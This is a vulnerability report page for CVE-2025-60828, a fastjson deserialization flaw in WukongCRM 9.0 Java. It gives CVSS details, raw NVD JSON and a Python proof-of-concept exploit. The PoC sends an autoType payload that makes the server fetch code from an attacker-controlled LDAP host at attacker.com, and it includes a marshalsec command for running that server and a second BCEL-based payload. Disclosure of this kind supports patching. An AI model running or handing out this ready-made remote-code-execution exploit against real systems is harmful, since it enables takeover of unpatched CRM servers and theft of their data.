Security Vulnerability Report
CVE-2025-60828 CVSS 6.5 MEDIUM

CVE-2025-60828

Published: 2025-10-08 14:15:46
Last Modified: 2025-10-10 16:17:12

Description

WukongCRM-9.0-JAVA was discovered to contain a fastjson deserialization vulnerability via the /OaExamine/setOaExamine interface.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:5kcrm:wukongcrm:9.0:*:*:*:*:*:*:* - VULNERABLE
WukongCRM-9.0-JAVA

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-60828 PoC - WukongCRM-9.0-JAVA fastjson deserialization RCE
# Attack vector: POST /OaExamine/setOaExamine
# Target: WukongCRM-9.0-JAVA with vulnerable fastjson version
import requests
import sys

TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else "http://target:8080"
LDAP_URL = sys.argv[2] if len(sys.argv) > 2 else "ldap://attacker.com:1389/Exploit"

# Step 1: Set up malicious LDAP/RMI server (using marshalsec or similar tool)
# Run on attacker machine:
#   java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://attacker.com:8000/#Exploit" 1389

# Step 2: Craft malicious JSON payload exploiting fastjson autoType
payload = {
    "@type": "com.sun.rowset.JdbcRowSetImpl",
    "dataSourceName": LDAP_URL,
    "autoCommit": True
}

# Step 3: Send exploit to vulnerable endpoint
endpoint = f"{TARGET_URL}/OaExamine/setOaExamine"
headers = {
    "Content-Type": "application/json",
    "User-Agent": "Mozilla/5.0"
}

try:
    response = requests.post(endpoint, json=payload, headers=headers, timeout=10)
    print(f"[+] Exploit sent to {endpoint}")
    print(f"[+] Status Code: {response.status_code}")
    print(f"[+] Response: {response.text[:500]}")
    if response.status_code == 200:
        print("[+] Target appears vulnerable!")
except Exception as e:
    print(f"[-] Error: {e}")

# Alternative payload using BasicDataSource (Tomcat JDBC pool)
alternative_payload = {
    "@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource",
    "driverClassName": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource",
    "driverClassLoader": {
        "@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"
    },
    "initialSize": 1
}
```

References

https://gist.github.com/ChangeYourWay/424478421d6a78d1f87d324cddcbfd59 - Third Party Advisory
https://github.com/ChangeYourWay/post/blob/main/WukongCRM-9.0-JAVA.md - Exploit

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-60828",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-08T14:15:45.617",
    "lastModified": "2025-10-10T16:17:11.943",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "WukongCRM-9.0-JAVA was discovered to contain a fastjson deserialization vulnerability via the /OaExamine/setOaExamine interface."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-502"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:5kcrm:wukongcrm:9.0:*:*:*:*:*:*:*",
                "matchCriteriaId": "40083370-EE93-4F63-811E-EBC970579592"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://gist.github.com/ChangeYourWay/424478421d6a78d1f87d324cddcbfd59",
        "source": "[email protected]",
        "tags": ["Third Party Advisory"]
      },
      {
        "url": "https://github.com/ChangeYourWay/post/blob/main/WukongCRM-9.0-JAVA.md",
        "source": "[email protected]",
        "tags": ["Exploit"]
      }
    ]
  }
}
```